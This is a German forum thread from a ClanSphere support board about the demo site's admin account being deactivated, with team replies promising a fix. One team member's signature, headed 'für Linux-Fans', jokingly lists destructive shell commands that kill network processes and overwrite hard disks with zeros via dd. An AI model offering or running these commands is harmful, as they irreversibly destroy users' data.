Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 5
Seite [1]
Tornado


Try to beat me




Beiträge: 117
# Thema - 14.04.2007 um 23:15 Uhr
Ich wollte mich grade mal auf der Demo-Page einloggen und habe festgestellt, dass der benuter "admin" deaktiviert ist. Da wurde wohl vergessen beim Erstellen der Demo-Version, die Möglichkeit andere Users bzw. den Admin-Account zu deaktivieren, zu unterdrücken.
Sollte ja eigentlich kein großes Problem sein das wieder in Ordnung zu bringen.
So ist es im Moment ja keine richtige Demo, weil ich denke mal, dass neue User von Clansphere sich das Admin-menü auch mal anschauen wollen, was z.Zt. nicht möglich ist.
Inaktiv
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 1 - 14.04.2007 um 23:17 Uhr
Danke. Wir kümmern uns darum.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
kasrk1n ClanSphere Team


Poststar





Beiträge: 703
# Antwort: 2 - 14.04.2007 um 23:20 Uhr
sollte eigentlich deaktiviert sein - kann sein dass es beim updaten nicht wieder zurückgestellt wurde


Inaktiv
|
h0n1g


Geekboy




Beiträge: 1013
# Antwort: 3 - 14.04.2007 um 23:26 Uhr
es wird bald eine aktuelle demo geben, von daher bitten wir um verständnis, es wird sowieso manches anders... aber das wird man später merken


------------------
ClanSphere - Makes your website a playmate, just dress her

Inaktiv
|
Tornado
Thread-Ersteller


Try to beat me




Beiträge: 117
# Antwort: 4 - 14.04.2007 um 23:30 Uhr
Ist diese denn im moment nicht aktuell? Im about steht doch RC3?


Inaktiv
|
h0n1g


Geekboy




Beiträge: 1013
# Antwort: 5 - 15.04.2007 um 13:36 Uhr
ja, sogesehen aktuell... aber halt nicht eingerichtet...


------------------
ClanSphere - Makes your website a playmate, just dress her

Inaktiv
|
Antworten: 5
Seite [1]


Sie müssen sich registrieren, um zu antworten.